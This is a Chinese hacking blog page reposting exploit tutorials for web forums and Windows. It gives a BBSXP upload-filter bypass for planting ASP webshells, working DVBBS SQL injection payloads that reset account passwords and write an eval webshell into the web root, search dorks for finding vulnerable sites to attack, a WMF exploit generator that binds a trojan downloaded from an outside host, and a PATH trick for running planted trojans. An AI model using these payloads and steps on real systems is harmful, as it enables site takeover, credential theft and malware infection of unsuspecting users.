• 2007年04月30日

    BBSXP最新漏洞简单分析以及利用 - [IT业界]

    BBSXP最新漏洞简单分析以及利用

    PS:天涯那看到的.没经过测试.又是伪装木马上传.文章早出来了.转来.大家测试下.!

    无意间发现一个BBSXP的0day,经过我自己测试,有80%左右的成功率,现在已经隔了1个月了,你们能不能利用我不保证。不过估计还有很多没有打上补丁的。以下介绍仅为学习交流使用,请勿用于非法用途。

    这个漏洞存在于bbsxp的最新版本(官方的不是最新版)漏洞估计比上次某人发的bbsxp注入漏洞更加严重。很简单,我这个是上传,而且是杀access和sql版,直接就可以拿到webshell,至于拿到webshell后……

    首先大家看一段代码,这个是我从网上下的一套bbsxp最新版,我先简单分析以下三段代码:

    if FileExt="asa" or FileExt="asp" or FileExt="cdx" or FileExt="cer" then error2("对不起,管理员设定本论坛不允许上传 "&FileExt&" 格式的文件")

    if Sitesettings("WatermarkOption")="Persits.Jpeg" and FileMIME="image/pjpeg" and UpClass<>"Face" then
    Set Jpeg = Server.CreateObject("Persits.Jpeg")
    Jpeg.Open Server.MapPath(""&SaveFile&"")

    '判断用户文件中的危险操作
    sStr="getfolder|createfolder|deletefolder|createdirectory|deletedirectory|saveas encode|function|UnEncode|execute|重命名|修改|属性|新建|复制|服务器|下载"
    sNoString=split(sStr,"|")
    for i=0 to ubound(sNoString)
    if instr(sTextAll,sNoString(i)) then
    set filedel=server.CreateObject ("Scripting.FileSystemObject")
    filedel.deletefile server.mappath(""&SaveFile&"")
    response.write "你的ip和时间已被纪录,由于你曾多次使用该方法对系统进行非法攻击,我们将会把你的数据向海南省公安部及海口网警报告!"
    response.write "<br>"
    response.write "时间:"&date()&" "&time()&""
    response.write "<br>"
    response.write "I P:"&request.servervariables("remote_addr")&" "
    set MyFiletemp=server.CreateObject("Scripting.FileSystemObject")
    set wfile=myfiletemp.opentextfile(server.mappath("ypsql.txt"),8)
    wfile.writeline date()&" "&time()&" "&request.servervariables("remote_addr")
    Response.end
    end if

    其中:文件保存类型是通过FileMIME判断FileMIME="image/pjpeg",也就是说上传类型要是图片,然后第一段代码,if FileExt="asa" or FileExt="asp" or FileExt="cdx" or FileExt="cer" then error2("对不起,管理员设定本论坛不允许上传 "&FileExt&" 格式的文件")的意思是:出错时候检查后缀.如果后缀是asa或者asp或者cdx或者cer的时候他就会提示错误。然后FileExt=文件后缀第三段代码的意思是:如果文件中有getfolder,createfolder等等特征的话。他就提示错误.错误类型在下边自己看了。

    Bssxp是通过这3段代码来过滤上传类型的.可这却造成了一个逻辑性的漏洞.聪明的读者可能已经发现了.他过滤的后缀只有asa、asp、cdx、cer如果我们传的文件的后缀不是这4个呢?嘿嘿,不是这4个也不能传.为什么?因为后边还有个FileMIME="image/pjpeg"。好,我们让文件是image/pjpeg。具体怎么实现呢?很简单。在我们的马马头部加上gif89a。也就是文件头欺骗。我们测试下一下看看:

    成功了! 然后你想干什么就可以干什么了。不过千万别非法入侵别人的系统哦~
    Tag:BBSXP 漏洞 分析 利用
    chapi 发表于23时54分09秒 | 阅读全文 | 评论 0 | 编辑 | 分享

  • 2006年05月12日

    dvbbs7.1sp1的savepost.asp漏洞的研究利用

    文章作者:风尘浪子
    信息来源:邪恶八进制信息安全团队(www.eviloctal.com

    动网论坛(DVBBS 7.1.0 SP1)Savepost.asp存在严重漏洞10-May-06
    发现:Bug.Center.Team
    严重程度:严重
    厂商名称:动网论坛(DVBBS)
    程序版本:DVBBS 7.1.0 SP1

    漏洞分析:
      因为程序在savepost.asp文件中变量过滤不严,导致数据库处理产生漏洞,可以取得论坛所有权限以及webshell。已经提交官方审核,并通过确认,补丁已经公布

    厂商补丁:
        http://bbs.dvbbs.net/dispbbs.asp?boardID=8&ID=1187367&page=1


        最新漏洞出来了,之前看见bct的人在qq群叫卖漏洞,要卖500大洋。没想到两天不到,就把漏洞发了。从 http://bbs.dvbbs.net/dispbbs.asp?boardID=8&ID=1187367&page=1下了个补丁,看了看,修改了许多。仔细看看Savepost.asp,发现也修改了许多地方。
    怎么办呢,看不到修改在哪里,只好自己朝下看了。
    看到下面:

    CODE:
    If Not IsNumeric(Buy_VIPType) Then Buy_VIPType = 0
              If Buy_UserList<>"" Then Buy_UserList = Replace(Replace(Replace(Buy_UserList,"|||",""),"@@@",""),"$PayMoney","")
              ToolsBuyUser = "0@@@"&Buy_Orders&"@@@"&Buy_VIPType&"@@@"&Buy_UserList&"|||$PayMoney|||"
              GetMoneyType = 3
              'UseTools = ToolsInfo(4)
    [Copy to clipboard]


    再朝下看:

    CODE:
    Public Sub Insert_To_Announce()
        '插入回复表
        DIM UbblistBody
        UbblistBody = Content
        UbblistBody = Ubblist(Content)
        SQL="insert into "&TotalUseTable&"(Boardid,ParentID,username,topic,body,DateAndTime,length,RootID,layer,orders,ip,Expression,locktopic,signflag,emailflag,isbest,PostUserID,isupload,IsAudit,Ubblist,GetMoney,UseTools,PostBuyUser,GetMoneyType) values ("&Dvbbs.boardid&","&ParentID&",'"&username&"','"&topic&"','"&Content&"','"&DateTimeStr&"','"&Dvbbs.strlength(Content)&"',"&RootID&","&ilayer&","&iorders&",'"&Dvbbs.UserTrueIP&"','"&Expression(1)&"',"&locktopic&","&signflag&","&mailflag&",0,"&Dvbbs.userid&","&ihaveupfile&","&IsAudit&",'"&UbblistBody&"',"&ToMoney&",'"&UseTools&"','"&ToolsBuyUser&"',"&GetMoneyType&")"
      Dvbbs.Execute(sql)
    [Copy to clipboard]


    可以看到Buy_UserList这个变量过滤有问题,呵呵,这个变量又导致ToolsBuyUser这个变量有问题。的确是可以注射,呵呵。
    在悔过头来看补丁里面:
    insert里面有修补:&dvbbs.checkstr(ToolsBuyUser)&"
    看来应该是这个地方了。
    利用起来最好是sql版本,可以updata改管理员密码,或者差异备份得shell。
    利用办法嘛,先注册一个id,找个版面发帖子,
    帖子内容下面有个选择帖子类型。
    选择---论坛交易币设置。
    下面是表单内容。

    看源代码:

    CODE:
    <option value="">选择帖子类型</option>
    <option value="0">赠送金币贴</option>
    <option value="1">获赠金币贴</option>
    <option value="2">论坛交易帖设置</option>
    </select>
    金币数量:<input name="ToMoney" size="4" value="">
    <div id="Buy_setting" style="display:none">
    购买数量限制:<input name="Buy_Orders" size="4" value="-1">(设置为“-1”则不限制)<BR>
    VIP用户浏览选项:不需要购买<INPUT TYPE="radio" NAME="Buy_VIPType" value="0" checked="checked">,需要购买<input type="radio" name="Buy_VIPType" value="1" /><br />
    可购买用户名单限制:<input name="Buy_UserList" size="30" value="" />(每个用户名用英文逗号“,”分隔符分开,注意区分大小写)
    </div>
    [Copy to clipboard]


    就是这个地方了,hoho。
    下面有个“可购买名单限制”,里面就填写:

    QUOTE:
    xjy111',0);update/**/Dv_User/**/set/**/UserEmail=(select[Password]from/**/Dv_admin/**/where[Username]='yellowcat')/**/where[UserName]='qq156544632';--


    提交成功。
    看看我的Email。
    晕死,居然成了空白。不知道为什么哈。
    来点直接的:

    QUOTE:
    coolidea|||123',0);update/**/Dv_User/**/set/**/UserPassword='469e80d32c0559f8'/**/where[UserName]='qq156544632';--


    这回好了,先退出,用admin888这个密码直接成功登录。
    好了,语句没有问题,大家现在可以自由发挥,会写工具的,吧delphi什么的搬出来。
    直接改管理员的密码进后台,可以恢复数据库的办法得到shell(参考angel的文章,dvbbs7.1sql版本依然可以吧)
    或者差异备份(后台可以看到web绝对路径):


    CODE:
    create table aspshell (str image);

    declare @a sysname select @a=db_name() backup database @a to disk='D:\wwwroot\dvbbs7sp1\wwwroot\qq156544632.bak;

    insert into aspshell values(0x3C256576616C20726571756573742822232229253E);
    declare @a sysname select @a=db_name() backup database @a to disk='D:\wwwroot\dvbbs7sp1\wwwroot\qq156544632.asp' with differential;

    drop table aspshell;
    [Copy to clipboard]


    另外一种得到web绝对路径办法(从职业欠钱兄弟那里看到的)

    CODE:
    create table regread(a varchar(255),b varchar(255));
    [Copy to clipboard]

    (建立一个临时表,存放读取到的信息)

    CODE:
    insert regread exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/'
    (使用xp_regread这个函数读取注册表信息得到虚拟目录路径,并存入临时表中)
    update dv_boke_user set boketitle=(select top 1 b from regread) where bokename='admin'
    [Copy to clipboard]


    至于acess版本没有研究。

    Tag:dvbbs 漏洞 利用 入侵 动网
    chapi 发表于23时01分00秒 | 阅读全文 | 评论 0 | 编辑 | 分享

  • 2006年05月12日

    入侵网站的各种漏洞的利用和搜索参数

    作者:wyjm
     
    一)E时代驿站漏洞
    百度搜索"E时代驿站"
    漏洞利用页面 /upload.asp 用老兵直接上传

    二)沸腾新闻系统上传漏洞
    搜索:沸腾展望新闻系统[核心:尘缘雅境]授权使用
    漏洞:没有对空格进行严格的限制。
    所以,我们直接选定要上传的asp木马,然后在后面加上空格
    它的上传文件是UploadFaceOK.asp

    三)尘缘雅境

    在GOOGLE里搜索关键词: V1.0 ACCESS Finish,就会看
    到出现了 一大堆 使用尘缘雅境系统的网站.比如说他的网站首页
    http://www.xx.com/asfq/index.asp,那么就要这样填写http://www.xx.com/asfq/admin/uploadfaceok.asp,[漏洞目录]:/asfq/admin
    (注意一定要加上admin),[漏洞文件]一般不用改,不过有些老版的尘缘系统的漏洞文是uploadok.asp,如果uploadfaceok.asp不成功再改

    四)OFSTAR论坛漏洞利用程序(群共享中)
    搜索: powered by ofstar.net
    1:输入管理员用户名 2:输入任意一个帖子的路径!

    3:单击获取密码,可以截取到管理员的MD5密码!是32位加密的!

    4:单击直接登陆按钮!程序会自动构造Cookies进行登陆!单击管理栏的"超管"可直接进入后台!

    上传木马: 选择后台的论坛管理=>风格摸版设置 插入以下代码! (其实上传shell部分和PHPWind一样)

    然后使用提交页面提交``可以直接拿到shell!


    五)破废墟BLOG漏洞
    百度搜:"破废墟 Bloging"
    在后面加上;upfile.asp
    结果返回:"DLOG错误:提交的数据来自网站外部 | 返 回
    或者 您要访问的网页有问题,无法显示。
    HTTP 500 - 内部服务器错误
    这说明这个文件是存在的,但是无法正常的访问,其实我们也可以利用
    直接用老兵上传木马http://www.xxxxx.com/blog/upfile.asp

    六)动网论坛  

    搜索 Dvbbs Version 7.0.0 Sp2 sql,就会搜索到很多有漏洞 的论坛,选一个,注册一个用户,记住用户名和密码;
      2、打开软件dvsp2_sql.exe,将要入侵的论坛地址替换掉软件上的地址。这里新手要注意,论坛地址一般是http://xxx.xxx.xxx/bbs/形式,这时你只需要用 xxx.xxx.xxx替代掉软件上的www.target.com就可以了,但有的 论坛是http://xxx.xxx.xxx/形式,没有bbs目录,你就要用 xxx.xxx.xxx替代掉软件上的www.target.com/bbs部分。
      3、打开软件包里的md59.exe软件,在MD5原码处填入你在论坛注册的密码,点击“16位加密”按钮,在加密密码处就得到了加密过的密码。
      4、回到dvsp2_sql.exe 软件,在“论坛用户”输入你注册的用户名,“前后台密码”处输入刚转换的加密密码。
      5、很重要,点击“注入(S)”按钮两次,注意,不多不少,刚好点击两次,别乱点击一通,也不要自己去选择软件上的“SQL”和“SP2”,软件自己会选择,切记!!!
      6、好了,现在用你注册的用户名重新登陆论坛,你就是管理员身份了。找到论坛“管理”,用用户名gxgl.com 密码你注册的密码登陆,你就是坛主了,可以对整个论坛 进行管理。


    七)极限论坛系统漏洞
    用"EzRick.com All Rights"做关键字搜索
    论坛的置顶帖子存在注入漏洞,大家打开置顶帖子后联接都是这种形式"showtopic.asp?TOPIC_ID=111&Forum_ID=11"当我们去掉后面的"&Forum_ID=11",注入点就出现了。
    然后我们在注入猜解工具的表段名里面添加上"Forum_UserDB"就可以跑出论坛的用户名和16位md5密码散列

    八)暴库入侵 OBLOG!
    搜索 :powered by OBlog
    暴库示例 :
    http://***/blog/index.asp?classid=3
    将以上连接中的最后一个正斜杠"/"改为"%5c"
    http://***/blog%5cindex.asp?classid=3

    截止powered by OBlog ver2.22之前90%的OBLOG站点都能暴库

    九)阿天在线整站上传漏洞
    百度搜索:阿天在线
    漏洞利用很简单
    直接用老兵上传工具就可以搞顶
    漏洞文件是mg_upfile.asp


    十)"动感系统"的上传漏洞

    漏洞的文件就是根目录下的upfile.asp
    在百度里搜
    inurl: (SoftView.Asp?SoftID=)
    这样找的是Access版的
    inurl: (/SoftView/SoftView_)
    这样找到的都是SQL版的

    十一)net pic PHP程序的漏洞利用

    当PHP程序有指定PATH时,在PATH文件后门加入%00可以
    上传任意文件.
    在百度里搜索"NEATPIC PHP目录直读版 1.2.3"你会找到很
    多装有些程序的站点


    www.google.com中输入"版本:Joekoe V6.0"
    或者在www.baidu.com中查询"关于我们 ┋ 网站留言 ┋ 友情链接 ┋ 与我在线"
    会找到很多joekoe论坛的地址

    使用方法:

    例如网址为http://www.xxx.com/yyy/forum.asp
    在主机名中输入www.xxx.com
    在发送主机路径中输入/yyy/upload.asp
    点击发送即可

    使用木马asp
    在回应信息中出现上传成功的提示后,在ie地址栏中输入
    http://www.xxx.com/yyy/upload/forum/newmm.asp即可

    www.baidu.com中输入"卓越网站快车"
    会找到很多相关的地址

    使用方法:

    例如网址为http://http://www.xxx.cn/htdocs/index.asp
    在主机名中输入www.xxx.com
    在发送主机路径中输入/htdocs/system/user/upimg1/fileupimg3.asp.如果没有/htdocs的虚拟目录,则不用改变默认值.
    点击发送即可

    使用木马asp
    在回应信息中出现上传成功的提示后,在"上传的asp文件名中"的编辑框中
    会出现上传成功的asp名称.例如
    HTTP://www.xxx.cn/htdocs/FICE/UP/20041122234053.cdx.as

    Tag:入侵 网站 漏洞 利用 搜索参数
    chapi 发表于22时58分25秒 | 阅读全文 | 评论 0 | 编辑 | 分享

  • 2006年01月17日

    利用MS0601漏洞做网页木马生成器

    作者:怪狗 文章来源:华夏黑客同盟

    我们首先要了解这个漏洞!
    适用系统:
    Microsoft Windows 2000 Service Pack 4 – 下载此更新
    Microsoft Windows XP Service Pack 1 和 Microsoft Windows XP Service Pack 2 – 下载此更新
    Microsoft Windows XP Professional x64 Edition – 下载此更新
    Microsoft Windows Server 2003 和 Microsoft Windows Server 2003 Service Pack 1 – 下载此更新
    Microsoft Windows Server 2003(用于基于 Itanium 的系统)和 Microsoft Windows Server 2003 SP1(用于基于 Itanium 的系统) – 下载此更新
    Microsoft Windows Server 2003 x64 Edition – 下载此更新
    Microsoft Windows 98、Microsoft Windows 98 Second Edition (SE)、Microsoft Windows Millennium Edition (ME) – 有关这些操作系统的详细信息,请查看本公告的“常见问题解答”部分。
    漏洞详细资料
    图形呈现引擎漏洞
    图形呈现引擎中由于其处理 Windows 图元文件 (WMF) 图像的方式而存在一个远程执行代码漏洞。 攻击者可以通过构建特制的 WMF 图像来利用此漏洞,如果用户访问了恶意网站或打开了电子邮件中特制的附件,此漏洞就可能允许远程执行代码。 成功利用此漏洞的攻击者可以完全控制受影响的系统。
    常见问题解答:
    此漏洞的影响范围有多大?
    这是一个远程执行代码漏洞。 如果用户使用管理用户权限登录,成功利用此漏洞的攻击者便可完全控制受影响的系统。 攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。 那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。
    造成漏洞的原因是什么?
    图形呈现引擎处理特制的 WMF 图像的方式中存在一个漏洞,可能允许执行任意代码。
    什么是 Windows 图元文件 (WMF) 图像格式?
    Windows 图元文件 (WMF) 图像是一个 16 位图元文件格式,其中可以同时包含矢量信息和位图信息。 它非常适合 Windows 操作系统。
    有关图像类型和格式的详细信息,请参阅 Microsoft 知识库文章 320314 或访问 MSDN Library 网站。
    攻击者可能利用此漏洞执行什么操作?
    成功利用此漏洞的攻击者可以完全控制受影响的系统。
    攻击者能够如何利用此漏洞?
    攻击者可能通过创建一个恶意网页或电子邮件中的特制附件,然后诱使用户访问此页面或者打开附件来利用此漏洞。 如果用户访问了该页面或者打开了附件,攻击者可能导致恶意代码在本地登录用户的安全上下文中运行。 它还可能使用横幅广告或其他方式显示特殊形式的 Web 内容,以便将 Web 内容传递至受影响的系统。
    攻击者也可能通过以下方式试图利用此漏洞:在其他文件(如 Word 文档)中嵌入特制的 Windows 图元文件 (WMF) 图像,并说服用户打开此文档。
    除了 Windows 图元文件 (WMF),此漏洞是否影响其他图像格式?
    唯一受影响的图像格式是 Windows 图元文件 (WMF) 格式。 但是,攻击者可能会重命名 WMF 文件的扩展名,使其表现为不同的图像格式。 在此情况下,图形呈现引擎很可能检测并将文件呈现为 WMF 图像,从而允许利用此漏洞。
    此漏洞与 MS05-053 纠正的漏洞之间有什么关系?
    两种漏洞都存在于图形呈现引擎中。 但是,此更新解决 MS05-053 没有解决的一个新漏洞。MS05-053 帮助防止受到该公告中所述漏洞的影响,但是没有解决此新漏洞。 此更新不能替代 MS05-053。您必须安装此更新和 MS05-053 安全公告中提供的更新,以帮助防止系统受到这两个漏洞的影响。

    使用方式:
    下载攻击工具:http://download1.77169.com/soft/hacrktools/control/2006/wmf.zip
    一,生成木马
    编辑 .bat 将.exe木马地址填上,点击生成.
    修改index.htm

    ms0601.exe http://bbs.77169.com/12.exe  绑定木马,生成exploit.wmf
    move /y exploit.wmf muma\exploit.wmf  复制到muma 目录.
    二,上传到自己的空间中
    将 index.htm 和 exploit.wmf 上传到空间的相同目录中就可以了.
    http://bbs.77169.com/tt/index.htm


    测试木马效果:
    运行:



    查看是否中木马:

    看已经中木马了.
    图形呈现引擎漏洞的补丁办法:
    要注销 Shimgvw.dll,请执行以下步骤:
    1.
    单击“开始”,单击“运行”,键入“regsvr32 -u %windir%\system32\shimgvw.dll”(不带引号),然后单击“确定”。

    2.
    当出现一个对话框确认过程已成功完成时,请单击“确定”。

    变通办法的影响: 当用户单击与 Windows 图片和传真查看器关联的图像类型的链接时,系统将不再启动 Windows 图片和传真查看器。
    要在部署安全更新之后撤消此变通办法,请重新注册 Shimgvw.dll。为此,请使用此同一过程,但是使用“regsvr32 %windir%\system32\shimgvw.dll”(不带引号)替换步骤 1 中的文本。
    Tag:利用 ms0601 漏洞 网页木马 生成器
    chapi 发表于23时05分44秒 | 阅读全文 | 评论 0 | 编辑 | 分享

  • 2006年01月06日

    有关目录优先执行权限的利用技巧

    作者:佚名 文章来源:hack58
     这个技巧就是win2000在执行搜索的时候, 首先查找根目录而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找。利用这个特性来,入侵者可以使用户指定运行某个程序。其实lion已经写了一个CMD BackDoor工具。
       但是还是有新的问题,因为不是所有的主机默认的用户环境变量一样的,比如查看我自己的环境变量,在cmd窗口打set命令:
    ComSpec=C:\WINNT\system32\cmd.exe
    HOMEDRIVE=C:
    HOMEPATH=\Documents and Settings\Administrator  (注意这个)
    LOGONSERVER=\\CNNS-XHACKER
    NUMBER_OF_PROCESSORS=1
    OS=Windows_NT
    Os2LibPath=C:\WINNT\system32\os2\dll;
    path=C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem;
    PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
    SystemDrive=C:
    SystemRoot=C:\WINNT
    TEMP=C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp
    TMP=C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp
    USERDOMAIN=CNNS-XHACKER
    USERNAME=Administrator
    USERPROFILE=C:\Documents and Settings\Administrator
    windir=C:\WINNT

    HOMEPATH=\Documents and Settings\Administrator这一句指定了的不是系统根目录,而是用户环境配置文件夹,所以当我在“开始”》“运行”输入cmd.exe运行时,它会在c:\Documents and Settings\Administrator查找有没有cmd.exe,然后再找system32目录里的cmd.exe,这样就不能利用这个特性执行指定程序了。
    解决的方法有两种:
    1.在c:\Documents and Settings\Administrator放入一个cmd.exe
    2.打开系统特性>高级>环境变量,在用户变量里增加一个变量名:
    HOMEPATH
    变量值为\(这样就会先搜索系统根目录下的)
    而用set命令是无法修改的,只有这种方法可以改。
       最后,我建议大家把原来是HOMEPATH=\的改掉,毕竟把木马之类放在系统根目录不一定好,我们可以另外查找一个可写的目录,把木马放到那里,然后再改HOMEPATH

    Tag:目录优先执行 权限 利用 技巧
    chapi 发表于21时36分59秒 | 阅读全文 | 评论 0 | 编辑 | 分享
共2页 1 2 下一页 最后一页

Lessons by English, baby!

随时随地看wap